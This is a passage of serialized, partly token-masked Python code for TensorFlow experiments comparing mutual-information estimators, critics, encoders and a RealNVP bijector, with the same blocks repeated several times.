range(layers)] + [output_dim],\n False, {'activation': activation})\n self._f_y = MLP([hidden_dim for _ in range(layers)] + [output_dim],\n False, {'activation': activation})\n\n def call(self, x, y):\n x_mapped = self._f_x(x)\n y_mapped = self._f_y(y)\n return tf.matmul(x_mapped, y_mapped, transpose_b=True)\n\n\ndef train(g1, g2, critic, loss_fn, learning_rate, batch_size=\n TRAIN_BATCH_SIZE, n_iters=15000, n_evals=15, compute_jacobian=False,\n noise_std=0.0, data_dimensions=DIMS // 2, n_iter=1, 
loss_name='InfoNCE'):\n \"\"\"Runs the training loop for a fixed model.\n\n Args:\n g1: Function, maps input1 to representation.\n g2: Function, maps input2 to representation.\n critic: Function, maps two representations to scalar.\n loss_fn: Function, mutual information estimator.\n learning_rate: Learning rate.\n batch_size: Training batch size.\n n_iters: Number of optimization iterations.\n n_evals: Number of model evaluations.\n compute_jacobian: Whether to estimate the singular values of the Jacobian.\n noise_std: Standard deviation for the Gaussian noise. Default is 0.0.\n data_dimensions: The dimension of the data. By default it's half of the\n original data dimension.\n Returns:\n Returns and instance of `Results` tuple.\n \"\"\"\n x_1, x_2, _ = processed_train_data(data_dimensions, batch_size)\n if noise_std > 0.0:\n assert x_1.shape == x_2.shape, 'X1 and X2 shapes must agree to add noise!'\n noise = noise_std * tf.random.normal(x_1.shape)\n x_1 += noise\n x_2 += noise\n code_1, code_2 = g1(x_1), g2(x_2)\n critic_matrix = critic(code_1, code_2)\n if compute_jacobian:\n jacobian = gradients.batch_jacobian(code_1, x_1, use_pfor=False)\n singular_values = tf.linalg.svd(jacobian, compute_uv=False)\n loss = loss_fn(critic_matrix)\n optimizer = tf.compat.v1.train.AdamOptimizer(learning_rate=learning_rate)\n if not loss_name == 'wpc':\n optimizer_op = optimizer.minimize(loss)\n else:\n gvs = optimizer.compute_gradients(loss)\n capped_gvs = [(tf.clip_by_value(grad, -1.0, 1.0), var) for grad,\n var in gvs]\n optimizer_op = optimizer.apply_gradients(capped_gvs)\n with tf.compat.v1.Session() as session:\n session.run(tf.compat.v1.global_variables_initializer())\n data_ph = tf.compat.v1.placeholder(tf.float32, shape=[None,\n data_dimensions])\n data_ph_noisy = data_ph + noise_std * tf.random.normal(tf.shape(\n input=data_ph))\n codes = g1(data_ph_noisy)\n (training_losses, testing_losses, classification_accuracies, iters,\n sigmas) = [], [], [], [], []\n for iter_n in range(n_iters):\n if iter_n % (n_iters // n_evals) == 0:\n iters.append(iter_n)\n accuracy = get_classification_accuracy(session, codes,\n data_ph, data_dimensions)\n classification_accuracies.append(accuracy)\n testing_losses.append(get_testing_loss(x_test, session,\n loss, data_ph, data_dimensions))\n if compute_jacobian:\n sigmas.append(session.run(singular_values))\n print(\n '{:d}th iter Loss_name {} Step {:>10d} fit {:>.5f} DS {} B {:d} lr {:f}'\n .format(n_iter, loss_name, iter_n, accuracy, args.\n dataset, args.batch_size, args.lr))\n loss_np, _ = session.run([loss, optimizer_op])\n training_losses.append(loss_np)\n return Results(iterations=iters, training_losses=training_losses,\n testing_losses=testing_losses, classification_accuracies=\n classification_accuracies, singular_values=sigmas)\n\n\ndef run_sweep(nets, critics, loss_fns, exp_name, **kwargs):\n \"\"\"Runs the sweep across encoder networks, critics, and the estimators.\"\"\"\n grid = itertools.product(nets, critics, loss_fns)\n data_frames = []\n results_with_singular_values = []\n for nets_name, critic_name, loss_name in grid:\n print('[New experiment] encoder: {}, critic: {}, loss: {}'.format(\n nets_name, critic_name, loss_name))\n with tf.Graph().as_default():\n g1, g2 = nets[nets_name]()\n critic = critics[critic_name]()\n loss_fn = loss_fns[loss_name]\n results_per_run = []\n for n in range(NRUNS):\n try:\n print('{:d}th run, loss: {}'.format(n, loss_name))\n if loss_name == 'drfc' and TFDS_NAME == 'cifar10':\n results = train(g1, g2, critic, loss_fn, 
**kwargs,\n learning_rate=LEARNING_RATE, n_iter=n,\n loss_name=loss_name)\n else:\n results = train(g1, g2, critic, loss_fn, **kwargs,\n learning_rate=LEARNING_RATE, n_iter=n,\n loss_name=loss_name)\n results_per_run.append(results)\n except Exception as ex:\n print('Run {} failed! Error: {}'.format(n, ex))\n for i, result in enumerate(results_per_run):\n data_frames.append(convert_to_data_frame(result, exp_name,\n nets_name, critic_name, loss_name, i))\n if kwargs.get('compute_jacobian', False):\n results_with_singular_values.append((ResultsConfig(\n nets_name, critic_name, loss_name), results_per_run))\n return {'df': pd.concat(data_frames), 'singular_values':\n results_with_singular_values}\n\n\n<function token>\n<code token>\n",
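The `RealNVP` bijector serialized above leaves the first `num_masked` features untouched, uses them to parameterize a transform of the remaining features, and concatenates the two halves back together (`_forward`, with `_inverse` undoing it). The sketch below shows that split/transform/concat pattern with a plain affine coupling in NumPy; the exp-of-log-scale parameterization and the toy linear conditioner are assumptions of the sketch, not the tfp `AffineScalar` wiring used in the stored code:

import numpy as np

def coupling_forward(x, num_masked, conditioner):
    x0, x1 = x[..., :num_masked], x[..., num_masked:]
    shift, log_scale = conditioner(x0)              # parameters depend only on the untouched half
    y1 = x1 * np.exp(log_scale) + shift
    return np.concatenate([x0, y1], axis=-1)

def coupling_inverse(y, num_masked, conditioner):
    y0, y1 = y[..., :num_masked], y[..., num_masked:]
    shift, log_scale = conditioner(y0)              # same parameters are recoverable since y0 == x0
    x1 = (y1 - shift) * np.exp(-log_scale)
    return np.concatenate([y0, x1], axis=-1)

rng = np.random.default_rng(0)
W_t, W_s = rng.normal(size=(7, 7)), rng.normal(size=(7, 7))
conditioner = lambda x0: (x0 @ W_t, np.tanh(x0 @ W_s))  # toy stand-in for the MLP template
x = rng.normal(size=(4, 14))
y = coupling_forward(x, 7, conditioner)
assert np.allclose(coupling_inverse(y, 7, conditioner), x)  # the coupling is exactly invertible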
"<import token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<function token>\n\n\ndef convert_to_data_frame(result, exp_name, nets, critic, loss, seed):\n \"\"\"Convert results class to a data frame.\"\"\"\n label = '{}, {}, {}'.format(nets, critic, loss)\n rows = list(zip(itertools.repeat(exp_name), itertools.repeat(nets),\n itertools.repeat(critic), itertools.repeat(loss), itertools.repeat(\n seed), result.iterations, [(-loss) for loss in result.\n testing_losses], result.classification_accuracies, itertools.repeat\n (label)))\n df_eval = pd.DataFrame(rows, columns=('exp_name', 'nets', 'Critic',\n 'Estimator', 'run', 'iteration', 'bound_value', 'accuracy', 'label'))\n df_eval['Estimator'] = df_eval['Estimator'].replace(to_replace={'cpc':\n '$CPC$', 'pcc': '$PCC$', 'drfc': '$D-RFC$', 'wpc': '$WPC$'})\n df_eval['Critic'] = df_eval['Critic'].replace(to_replace={'concat':\n 'MLP', 'separable': 'Separable', 'innerprod': 'Inner product',\n 'bilinear': 'Bilinear'})\n return df_eval\n\n\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n\n\[email protected]\ndef js_fgan_lower_bound(f):\n \"\"\"Lower bound on Jensen-Shannon divergence from Nowozin et al. (2016).\"\"\"\n f_diag = tf.linalg.tensor_diag_part(f)\n first_term = tf.reduce_mean(-tf.nn.softplus(-f_diag))\n n = tf.cast(f.shape[0], tf.float32)\n second_term = (tf.reduce_sum(tf.nn.softplus(f)) - tf.reduce_sum(tf.nn.\n softplus(f_diag))) / (n * (n - 1.0))\n return first_term - second_term\n\n\n<function token>\n\n\[email protected]\ndef our_lower_bound(scores):\n \"\"\"Our lower bound\"\"\"\n batch_size = tf.cast(scores.shape[0], tf.float32)\n joint_term = tf.reduce_mean(input_tensor=tf.linalg.diag_part(scores))\n scores_sq = scores ** 2\n marg_num = batch_size * (batch_size - 1.0)\n marg_term = tf.reduce_sum(input_tensor=scores_sq) - tf.reduce_sum(\n input_tensor=tf.linalg.diag_part(scores_sq))\n marg_term = marg_term / marg_num\n return joint_term - 0.5 * marg_term\n\n\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n\n\ndef logistic_fit(x_train, y_train, x_test, y_test):\n logistic_regressor = sk_linear.LogisticRegression(solver='saga',\n multi_class='multinomial', tol=0.1, C=10.0)\n from sklearn.preprocessing import MinMaxScaler\n scaler = MinMaxScaler()\n x_train = scaler.fit_transform(x_train)\n x_test = scaler.transform(x_test)\n logistic_regressor.fit(x_train, y_train.ravel())\n return logistic_regressor.score(x_test, y_test.ravel())\n\n\n<code token>\n\n\ndef map_fn(example):\n image = example[FEATURE_INPUT]\n image = tf.cast(image, tf.float32) / 255.0\n image = tf.reshape(image, [-1])\n label = example[FEATURE_LABEL]\n return {FEATURE_INPUT: image, FEATURE_LABEL: label}\n\n\n<function token>\n<function token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<function token>\n\n\nclass MLP(tf.keras.Model):\n\n def __init__(self, layer_dimensions, shortcuts, dense_kwargs={}):\n super(MLP, self).__init__()\n self._layers = [tfkl.Dense(dimensions, **dense_kwargs) for\n dimensions in layer_dimensions[:-1]]\n dense_kwargs_copy = copy.deepcopy(dense_kwargs)\n dense_kwargs_copy['activation'] = None\n self._layers.append(tfkl.Dense(layer_dimensions[-1], **\n dense_kwargs_copy))\n self._shortcuts = shortcuts\n\n @property\n def layers(self):\n return self._layers\n\n def __call__(self, 
inputs):\n x = inputs\n for layer in self.layers:\n x = layer(x) + x if self._shortcuts else layer(x)\n return x\n\n\nclass LayerNorm(tfkl.Layer):\n \"\"\" Layer Normalization in the style of https://arxiv.org/abs/1607.06450 \"\"\"\n\n def __init__(self, scale_initializer='ones', bias_initializer='zeros',\n axes=[1, 2, 3], epsilon=1e-06, **kwargs):\n super(LayerNorm, self).__init__(**kwargs)\n self.epsilon = epsilon\n self.scale_initializer = tf.keras.initializers.get(scale_initializer)\n self.bias_initializer = tf.keras.initializers.get(bias_initializer)\n self.axes = axes\n\n def build(self, input_shape):\n self.scale = self.add_weight(shape=(input_shape[-1],), initializer=\n self.scale_initializer, trainable=True, name='{}_scale'.format(\n self.name))\n self.bias = self.add_weight(shape=(input_shape[-1],), initializer=\n self.bias_initializer, trainable=True, name='{}_bias'.format(\n self.name))\n self.built = True\n\n def call(self, x, mask=None):\n mean = tf.keras.backend.mean(x, axis=self.axes, keepdims=True)\n std = tf.keras.backend.std(x, axis=self.axes, keepdims=True)\n norm = (x - mean) * (1 / (std + self.epsilon))\n return norm * self.scale + self.bias\n\n def compute_output_shape(self, input_shape):\n return input_shape\n\n\nclass ConvNet(tf.keras.Sequential):\n\n def __init__(self, channels=64, kernel_size=5, input_dim=DIMS // 2,\n output_dim=100, activation=tf.nn.relu):\n super(ConvNet, self).__init__([tfkl.Reshape((14, 28, 1),\n input_shape=(input_dim,)), tfkl.Conv2D(channels, kernel_size,\n strides=2, padding='same', activation=activation), tfkl.Conv2D(\n 2 * channels, kernel_size, strides=2, padding='same',\n activation=activation), LayerNorm(), tfkl.\n GlobalAveragePooling2D(), tfkl.Dense(output_dim)])\n\n\n<import token>\n\n\nclass RealNVP(bijector_lib.Bijector):\n\n def __init__(self, num_masked, shift_and_log_scale_fn=None, bijector_fn\n =None, is_constant_jacobian=False, validate_args=False, name=None):\n name = name or 'real_nvp'\n if num_masked < 0:\n raise ValueError('num_masked must be a non-negative integer.')\n self._num_masked = num_masked\n self._input_depth = None\n if bool(shift_and_log_scale_fn) == bool(bijector_fn):\n raise ValueError(\n 'Exactly one of `shift_and_log_scale_fn` and `bijector_fn` should be specified.'\n )\n if shift_and_log_scale_fn:\n\n def _bijector_fn(x0, input_depth, **condition_kwargs):\n shift, log_scale = shift_and_log_scale_fn(x0, input_depth,\n **condition_kwargs)\n return affine_scalar.AffineScalar(shift=shift, scale=log_scale)\n bijector_fn = _bijector_fn\n if validate_args:\n bijector_fn = _validate_bijector_fn(bijector_fn)\n self._shift_and_log_scale_fn = shift_and_log_scale_fn\n self._bijector_fn = bijector_fn\n super(RealNVP, self).__init__(forward_min_event_ndims=1,\n is_constant_jacobian=is_constant_jacobian, validate_args=\n validate_args, name=name)\n\n def _cache_input_depth(self, x):\n if self._input_depth is None:\n self._input_depth = tf.compat.dimension_value(tensorshape_util.\n with_rank_at_least(x.shape, 1)[-1])\n if self._input_depth is None:\n raise NotImplementedError(\n 'Rightmost dimension must be known prior to graph execution.'\n )\n if self._num_masked >= self._input_depth:\n raise ValueError(\n 'Number of masked units must be smaller than the event size.'\n )\n\n def _forward(self, x, **condition_kwargs):\n self._cache_input_depth(x)\n x0, x1 = x[..., :self._num_masked], x[..., self._num_masked:]\n y1 = self._bijector_fn(x0, self._input_depth - self._num_masked, **\n condition_kwargs).forward(x1)\n y = 
tf.concat([x0, y1], axis=-1)\n return y\n\n def _inverse(self, y, **condition_kwargs):\n self._cache_input_depth(y)\n y0, y1 = y[..., :self._num_masked], y[..., self._num_masked:]\n x1 = self._bijector_fn(y0, self._input_depth - self._num_masked, **\n condition_kwargs).inverse(y1)\n x = tf.concat([y0, x1], axis=-1)\n return x\n\n def _forward_log_det_jacobian(self, x, **condition_kwargs):\n self._cache_input_depth(x)\n x0, x1 = x[..., :self._num_masked], x[..., self._num_masked:]\n return self._bijector_fn(x0, self._input_depth - self._num_masked,\n **condition_kwargs).forward_log_det_jacobian(x1, event_ndims=1)\n\n def _inverse_log_det_jacobian(self, y, **condition_kwargs):\n self._cache_input_depth(y)\n y0, y1 = y[..., :self._num_masked], y[..., self._num_masked:]\n return self._bijector_fn(y0, self._input_depth - self._num_masked,\n **condition_kwargs).inverse_log_det_jacobian(y1, event_ndims=1)\n\n\n<function token>\n\n\nclass RealNVPBijector(tf.keras.Model):\n\n def __init__(self, dimensions, n_couplings, hidden_layers, dense_kwargs):\n super(RealNVPBijector, self).__init__()\n permutations = [np.random.permutation(dimensions) for _ in range(\n n_couplings)]\n bijectors = []\n for permutation in permutations:\n bijectors.append(RealNVP(dimensions // 2,\n real_nvp_default_template(hidden_layers, **dense_kwargs)))\n bijectors.append(tfb.Permute(permutation))\n self._bijector = tfb.Chain(bijectors)\n\n def call(self, inputs):\n return self._bijector.forward(inputs)\n\n\nclass InnerProdCritic(tf.keras.Model):\n\n def call(self, x, y):\n return tf.matmul(x, y, transpose_b=True)\n\n\nclass BilinearCritic(tf.keras.Model):\n\n def __init__(self, feature_dim=100, **kwargs):\n super(BilinearCritic, self).__init__(**kwargs)\n self._W = tfkl.Dense(feature_dim, use_bias=False)\n\n def call(self, x, y):\n return tf.matmul(x, self._W(y), transpose_b=True)\n\n\nclass ConcatCritic(tf.keras.Model):\n\n def __init__(self, hidden_dim=200, layers=1, activation='relu', **kwargs):\n super(ConcatCritic, self).__init__(**kwargs)\n self._f = MLP([hidden_dim for _ in range(layers)] + [1], False, {\n 'activation': 'relu'})\n\n def call(self, x, y):\n batch_size = tf.shape(input=x)[0]\n x_tiled = tf.tile(x[None, :], (batch_size, 1, 1))\n y_tiled = tf.tile(y[:, None], (1, batch_size, 1))\n xy_pairs = tf.reshape(tf.concat((x_tiled, y_tiled), axis=2), [\n batch_size * batch_size, -1])\n scores = self._f(xy_pairs)\n return tf.transpose(a=tf.reshape(scores, [batch_size, batch_size]))\n\n\nclass SeparableCritic(tf.keras.Model):\n\n def __init__(self, hidden_dim=100, output_dim=100, layers=1, activation\n ='relu', **kwargs):\n super(SeparableCritic, self).__init__(**kwargs)\n self._f_x = MLP([hidden_dim for _ in range(layers)] + [output_dim],\n False, {'activation': activation})\n self._f_y = MLP([hidden_dim for _ in range(layers)] + [output_dim],\n False, {'activation': activation})\n\n def call(self, x, y):\n x_mapped = self._f_x(x)\n y_mapped = self._f_y(y)\n return tf.matmul(x_mapped, y_mapped, transpose_b=True)\n\n\ndef train(g1, g2, critic, loss_fn, learning_rate, batch_size=\n TRAIN_BATCH_SIZE, n_iters=15000, n_evals=15, compute_jacobian=False,\n noise_std=0.0, data_dimensions=DIMS // 2, n_iter=1, loss_name='InfoNCE'):\n \"\"\"Runs the training loop for a fixed model.\n\n Args:\n g1: Function, maps input1 to representation.\n g2: Function, maps input2 to representation.\n critic: Function, maps two representations to scalar.\n loss_fn: Function, mutual information estimator.\n learning_rate: Learning rate.\n 
batch_size: Training batch size.\n n_iters: Number of optimization iterations.\n n_evals: Number of model evaluations.\n compute_jacobian: Whether to estimate the singular values of the Jacobian.\n noise_std: Standard deviation for the Gaussian noise. Default is 0.0.\n data_dimensions: The dimension of the data. By default it's half of the\n original data dimension.\n Returns:\n Returns and instance of `Results` tuple.\n \"\"\"\n x_1, x_2, _ = processed_train_data(data_dimensions, batch_size)\n if noise_std > 0.0:\n assert x_1.shape == x_2.shape, 'X1 and X2 shapes must agree to add noise!'\n noise = noise_std * tf.random.normal(x_1.shape)\n x_1 += noise\n x_2 += noise\n code_1, code_2 = g1(x_1), g2(x_2)\n critic_matrix = critic(code_1, code_2)\n if compute_jacobian:\n jacobian = gradients.batch_jacobian(code_1, x_1, use_pfor=False)\n singular_values = tf.linalg.svd(jacobian, compute_uv=False)\n loss = loss_fn(critic_matrix)\n optimizer = tf.compat.v1.train.AdamOptimizer(learning_rate=learning_rate)\n if not loss_name == 'wpc':\n optimizer_op = optimizer.minimize(loss)\n else:\n gvs = optimizer.compute_gradients(loss)\n capped_gvs = [(tf.clip_by_value(grad, -1.0, 1.0), var) for grad,\n var in gvs]\n optimizer_op = optimizer.apply_gradients(capped_gvs)\n with tf.compat.v1.Session() as session:\n session.run(tf.compat.v1.global_variables_initializer())\n data_ph = tf.compat.v1.placeholder(tf.float32, shape=[None,\n data_dimensions])\n data_ph_noisy = data_ph + noise_std * tf.random.normal(tf.shape(\n input=data_ph))\n codes = g1(data_ph_noisy)\n (training_losses, testing_losses, classification_accuracies, iters,\n sigmas) = [], [], [], [], []\n for iter_n in range(n_iters):\n if iter_n % (n_iters // n_evals) == 0:\n iters.append(iter_n)\n accuracy = get_classification_accuracy(session, codes,\n data_ph, data_dimensions)\n classification_accuracies.append(accuracy)\n testing_losses.append(get_testing_loss(x_test, session,\n loss, data_ph, data_dimensions))\n if compute_jacobian:\n sigmas.append(session.run(singular_values))\n print(\n '{:d}th iter Loss_name {} Step {:>10d} fit {:>.5f} DS {} B {:d} lr {:f}'\n .format(n_iter, loss_name, iter_n, accuracy, args.\n dataset, args.batch_size, args.lr))\n loss_np, _ = session.run([loss, optimizer_op])\n training_losses.append(loss_np)\n return Results(iterations=iters, training_losses=training_losses,\n testing_losses=testing_losses, classification_accuracies=\n classification_accuracies, singular_values=sigmas)\n\n\ndef run_sweep(nets, critics, loss_fns, exp_name, **kwargs):\n \"\"\"Runs the sweep across encoder networks, critics, and the estimators.\"\"\"\n grid = itertools.product(nets, critics, loss_fns)\n data_frames = []\n results_with_singular_values = []\n for nets_name, critic_name, loss_name in grid:\n print('[New experiment] encoder: {}, critic: {}, loss: {}'.format(\n nets_name, critic_name, loss_name))\n with tf.Graph().as_default():\n g1, g2 = nets[nets_name]()\n critic = critics[critic_name]()\n loss_fn = loss_fns[loss_name]\n results_per_run = []\n for n in range(NRUNS):\n try:\n print('{:d}th run, loss: {}'.format(n, loss_name))\n if loss_name == 'drfc' and TFDS_NAME == 'cifar10':\n results = train(g1, g2, critic, loss_fn, **kwargs,\n learning_rate=LEARNING_RATE, n_iter=n,\n loss_name=loss_name)\n else:\n results = train(g1, g2, critic, loss_fn, **kwargs,\n learning_rate=LEARNING_RATE, n_iter=n,\n loss_name=loss_name)\n results_per_run.append(results)\n except Exception as ex:\n print('Run {} failed! 
Error: {}'.format(n, ex))\n for i, result in enumerate(results_per_run):\n data_frames.append(convert_to_data_frame(result, exp_name,\n nets_name, critic_name, loss_name, i))\n if kwargs.get('compute_jacobian', False):\n results_with_singular_values.append((ResultsConfig(\n nets_name, critic_name, loss_name), results_per_run))\n return {'df': pd.concat(data_frames), 'singular_values':\n results_with_singular_values}\n\n\n<function token>\n<code token>\n",
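For the 'wpc' estimator, the `train` function above swaps `optimizer.minimize(loss)` for an explicit compute_gradients -> clip_by_value -> apply_gradients sequence, so each gradient entry is clipped to [-1, 1] before the Adam update. A self-contained sketch of that path on a toy quadratic loss (assumes TensorFlow with the v1 compat API is available; the variable and loss here are placeholders, not the model in the stored code):

import tensorflow as tf

tf.compat.v1.disable_eager_execution()              # the serialized code runs in graph mode

w = tf.compat.v1.get_variable('w', initializer=tf.constant([2.0, -3.0]))
loss = tf.reduce_sum(w ** 2)

optimizer = tf.compat.v1.train.AdamOptimizer(learning_rate=0.1)
gvs = optimizer.compute_gradients(loss, var_list=[w])
capped_gvs = [(tf.clip_by_value(grad, -1.0, 1.0), var) for grad, var in gvs]
train_op = optimizer.apply_gradients(capped_gvs)    # gradients are clipped before the update

with tf.compat.v1.Session() as session:
    session.run(tf.compat.v1.global_variables_initializer())
    for _ in range(5):
        _, w_np = session.run([train_op, w])
    print(w_np)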
"<import token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<function token>\n\n\ndef convert_to_data_frame(result, exp_name, nets, critic, loss, seed):\n \"\"\"Convert results class to a data frame.\"\"\"\n label = '{}, {}, {}'.format(nets, critic, loss)\n rows = list(zip(itertools.repeat(exp_name), itertools.repeat(nets),\n itertools.repeat(critic), itertools.repeat(loss), itertools.repeat(\n seed), result.iterations, [(-loss) for loss in result.\n testing_losses], result.classification_accuracies, itertools.repeat\n (label)))\n df_eval = pd.DataFrame(rows, columns=('exp_name', 'nets', 'Critic',\n 'Estimator', 'run', 'iteration', 'bound_value', 'accuracy', 'label'))\n df_eval['Estimator'] = df_eval['Estimator'].replace(to_replace={'cpc':\n '$CPC$', 'pcc': '$PCC$', 'drfc': '$D-RFC$', 'wpc': '$WPC$'})\n df_eval['Critic'] = df_eval['Critic'].replace(to_replace={'concat':\n 'MLP', 'separable': 'Separable', 'innerprod': 'Inner product',\n 'bilinear': 'Bilinear'})\n return df_eval\n\n\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n\n\[email protected]\ndef js_fgan_lower_bound(f):\n \"\"\"Lower bound on Jensen-Shannon divergence from Nowozin et al. (2016).\"\"\"\n f_diag = tf.linalg.tensor_diag_part(f)\n first_term = tf.reduce_mean(-tf.nn.softplus(-f_diag))\n n = tf.cast(f.shape[0], tf.float32)\n second_term = (tf.reduce_sum(tf.nn.softplus(f)) - tf.reduce_sum(tf.nn.\n softplus(f_diag))) / (n * (n - 1.0))\n return first_term - second_term\n\n\n<function token>\n\n\[email protected]\ndef our_lower_bound(scores):\n \"\"\"Our lower bound\"\"\"\n batch_size = tf.cast(scores.shape[0], tf.float32)\n joint_term = tf.reduce_mean(input_tensor=tf.linalg.diag_part(scores))\n scores_sq = scores ** 2\n marg_num = batch_size * (batch_size - 1.0)\n marg_term = tf.reduce_sum(input_tensor=scores_sq) - tf.reduce_sum(\n input_tensor=tf.linalg.diag_part(scores_sq))\n marg_term = marg_term / marg_num\n return joint_term - 0.5 * marg_term\n\n\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n\n\ndef logistic_fit(x_train, y_train, x_test, y_test):\n logistic_regressor = sk_linear.LogisticRegression(solver='saga',\n multi_class='multinomial', tol=0.1, C=10.0)\n from sklearn.preprocessing import MinMaxScaler\n scaler = MinMaxScaler()\n x_train = scaler.fit_transform(x_train)\n x_test = scaler.transform(x_test)\n logistic_regressor.fit(x_train, y_train.ravel())\n return logistic_regressor.score(x_test, y_test.ravel())\n\n\n<code token>\n\n\ndef map_fn(example):\n image = example[FEATURE_INPUT]\n image = tf.cast(image, tf.float32) / 255.0\n image = tf.reshape(image, [-1])\n label = example[FEATURE_LABEL]\n return {FEATURE_INPUT: image, FEATURE_LABEL: label}\n\n\n<function token>\n<function token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<function token>\n\n\nclass MLP(tf.keras.Model):\n\n def __init__(self, layer_dimensions, shortcuts, dense_kwargs={}):\n super(MLP, self).__init__()\n self._layers = [tfkl.Dense(dimensions, **dense_kwargs) for\n dimensions in layer_dimensions[:-1]]\n dense_kwargs_copy = copy.deepcopy(dense_kwargs)\n dense_kwargs_copy['activation'] = None\n self._layers.append(tfkl.Dense(layer_dimensions[-1], **\n dense_kwargs_copy))\n self._shortcuts = shortcuts\n\n @property\n def layers(self):\n return self._layers\n\n def __call__(self, 
inputs):\n x = inputs\n for layer in self.layers:\n x = layer(x) + x if self._shortcuts else layer(x)\n return x\n\n\nclass LayerNorm(tfkl.Layer):\n \"\"\" Layer Normalization in the style of https://arxiv.org/abs/1607.06450 \"\"\"\n\n def __init__(self, scale_initializer='ones', bias_initializer='zeros',\n axes=[1, 2, 3], epsilon=1e-06, **kwargs):\n super(LayerNorm, self).__init__(**kwargs)\n self.epsilon = epsilon\n self.scale_initializer = tf.keras.initializers.get(scale_initializer)\n self.bias_initializer = tf.keras.initializers.get(bias_initializer)\n self.axes = axes\n\n def build(self, input_shape):\n self.scale = self.add_weight(shape=(input_shape[-1],), initializer=\n self.scale_initializer, trainable=True, name='{}_scale'.format(\n self.name))\n self.bias = self.add_weight(shape=(input_shape[-1],), initializer=\n self.bias_initializer, trainable=True, name='{}_bias'.format(\n self.name))\n self.built = True\n\n def call(self, x, mask=None):\n mean = tf.keras.backend.mean(x, axis=self.axes, keepdims=True)\n std = tf.keras.backend.std(x, axis=self.axes, keepdims=True)\n norm = (x - mean) * (1 / (std + self.epsilon))\n return norm * self.scale + self.bias\n\n def compute_output_shape(self, input_shape):\n return input_shape\n\n\nclass ConvNet(tf.keras.Sequential):\n\n def __init__(self, channels=64, kernel_size=5, input_dim=DIMS // 2,\n output_dim=100, activation=tf.nn.relu):\n super(ConvNet, self).__init__([tfkl.Reshape((14, 28, 1),\n input_shape=(input_dim,)), tfkl.Conv2D(channels, kernel_size,\n strides=2, padding='same', activation=activation), tfkl.Conv2D(\n 2 * channels, kernel_size, strides=2, padding='same',\n activation=activation), LayerNorm(), tfkl.\n GlobalAveragePooling2D(), tfkl.Dense(output_dim)])\n\n\n<import token>\n\n\nclass RealNVP(bijector_lib.Bijector):\n\n def __init__(self, num_masked, shift_and_log_scale_fn=None, bijector_fn\n =None, is_constant_jacobian=False, validate_args=False, name=None):\n name = name or 'real_nvp'\n if num_masked < 0:\n raise ValueError('num_masked must be a non-negative integer.')\n self._num_masked = num_masked\n self._input_depth = None\n if bool(shift_and_log_scale_fn) == bool(bijector_fn):\n raise ValueError(\n 'Exactly one of `shift_and_log_scale_fn` and `bijector_fn` should be specified.'\n )\n if shift_and_log_scale_fn:\n\n def _bijector_fn(x0, input_depth, **condition_kwargs):\n shift, log_scale = shift_and_log_scale_fn(x0, input_depth,\n **condition_kwargs)\n return affine_scalar.AffineScalar(shift=shift, scale=log_scale)\n bijector_fn = _bijector_fn\n if validate_args:\n bijector_fn = _validate_bijector_fn(bijector_fn)\n self._shift_and_log_scale_fn = shift_and_log_scale_fn\n self._bijector_fn = bijector_fn\n super(RealNVP, self).__init__(forward_min_event_ndims=1,\n is_constant_jacobian=is_constant_jacobian, validate_args=\n validate_args, name=name)\n\n def _cache_input_depth(self, x):\n if self._input_depth is None:\n self._input_depth = tf.compat.dimension_value(tensorshape_util.\n with_rank_at_least(x.shape, 1)[-1])\n if self._input_depth is None:\n raise NotImplementedError(\n 'Rightmost dimension must be known prior to graph execution.'\n )\n if self._num_masked >= self._input_depth:\n raise ValueError(\n 'Number of masked units must be smaller than the event size.'\n )\n\n def _forward(self, x, **condition_kwargs):\n self._cache_input_depth(x)\n x0, x1 = x[..., :self._num_masked], x[..., self._num_masked:]\n y1 = self._bijector_fn(x0, self._input_depth - self._num_masked, **\n condition_kwargs).forward(x1)\n y = 
tf.concat([x0, y1], axis=-1)\n return y\n\n def _inverse(self, y, **condition_kwargs):\n self._cache_input_depth(y)\n y0, y1 = y[..., :self._num_masked], y[..., self._num_masked:]\n x1 = self._bijector_fn(y0, self._input_depth - self._num_masked, **\n condition_kwargs).inverse(y1)\n x = tf.concat([y0, x1], axis=-1)\n return x\n\n def _forward_log_det_jacobian(self, x, **condition_kwargs):\n self._cache_input_depth(x)\n x0, x1 = x[..., :self._num_masked], x[..., self._num_masked:]\n return self._bijector_fn(x0, self._input_depth - self._num_masked,\n **condition_kwargs).forward_log_det_jacobian(x1, event_ndims=1)\n\n def _inverse_log_det_jacobian(self, y, **condition_kwargs):\n self._cache_input_depth(y)\n y0, y1 = y[..., :self._num_masked], y[..., self._num_masked:]\n return self._bijector_fn(y0, self._input_depth - self._num_masked,\n **condition_kwargs).inverse_log_det_jacobian(y1, event_ndims=1)\n\n\n<function token>\n\n\nclass RealNVPBijector(tf.keras.Model):\n\n def __init__(self, dimensions, n_couplings, hidden_layers, dense_kwargs):\n super(RealNVPBijector, self).__init__()\n permutations = [np.random.permutation(dimensions) for _ in range(\n n_couplings)]\n bijectors = []\n for permutation in permutations:\n bijectors.append(RealNVP(dimensions // 2,\n real_nvp_default_template(hidden_layers, **dense_kwargs)))\n bijectors.append(tfb.Permute(permutation))\n self._bijector = tfb.Chain(bijectors)\n\n def call(self, inputs):\n return self._bijector.forward(inputs)\n\n\nclass InnerProdCritic(tf.keras.Model):\n\n def call(self, x, y):\n return tf.matmul(x, y, transpose_b=True)\n\n\nclass BilinearCritic(tf.keras.Model):\n\n def __init__(self, feature_dim=100, **kwargs):\n super(BilinearCritic, self).__init__(**kwargs)\n self._W = tfkl.Dense(feature_dim, use_bias=False)\n\n def call(self, x, y):\n return tf.matmul(x, self._W(y), transpose_b=True)\n\n\nclass ConcatCritic(tf.keras.Model):\n\n def __init__(self, hidden_dim=200, layers=1, activation='relu', **kwargs):\n super(ConcatCritic, self).__init__(**kwargs)\n self._f = MLP([hidden_dim for _ in range(layers)] + [1], False, {\n 'activation': 'relu'})\n\n def call(self, x, y):\n batch_size = tf.shape(input=x)[0]\n 